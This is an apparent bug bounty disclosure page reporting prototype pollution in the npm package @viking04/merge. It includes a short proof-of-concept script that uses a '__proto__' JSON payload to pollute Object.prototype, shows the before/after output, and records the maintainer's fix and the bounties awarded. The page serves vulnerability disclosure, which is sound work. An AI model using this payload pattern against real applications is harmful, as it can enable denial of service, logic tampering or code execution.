We've joined Protect AIJoin us over there for bounties up to $50,000+ for vulnerabilities in AI/ML repos

Prototype Pollution in viking04/merge

Valid

Reported on

Sep 8th 2021

✍️ Description

The npm package @viking04/merge is vulnerable to Prototype Pollution. More Details on the Vulnerability: https://medium.com/node-modules/what-is-prototype-pollution-and-why-is-it-such-a-big-deal-2dd8d89a93c

🕵️‍♂️ Proof of Concept

LIVE POC LINK

var merge = require("@viking04/merge")
var a = {"a":{"red":"apple"}}
var b = {"b":{"yellow":"mango"}}
var c = JSON.parse('{"__proto__":{"polluted":true}}')
console.log("Before:"+{}.polluted)
merge(a,b,c)
console.log("After:"+{}.polluted)

Output

"Before:undefined"
"After:true"

💥 Impact

May lead to DOS/Remote Code Execution/Changing Business Logic/Information Disclosure/XSS depending on case.

Occurrences

We created a GitHub Issue asking the maintainers to create a SECURITY.md 2 years ago
Jayateertha Guruprasad submitted a
patch
2 years ago
viking04
2 years ago

Maintainer

Good one, Didn't think of this case ,will need to retest and fix it. Does filtering key with __proto__ and constructorfix this completely ?

viking04 validated this vulnerability 2 years ago
Jayateertha Guruprasad has been awarded the disclosure bounty
The fix bounty is now up for grabs
viking04 marked this as fixed with commit baba40 2 years ago
viking04 has been awarded the fix bounty
This vulnerability will not receive a CVE
Jamie Slome
2 years ago

Admin

CVE published! 🎉

to join this conversation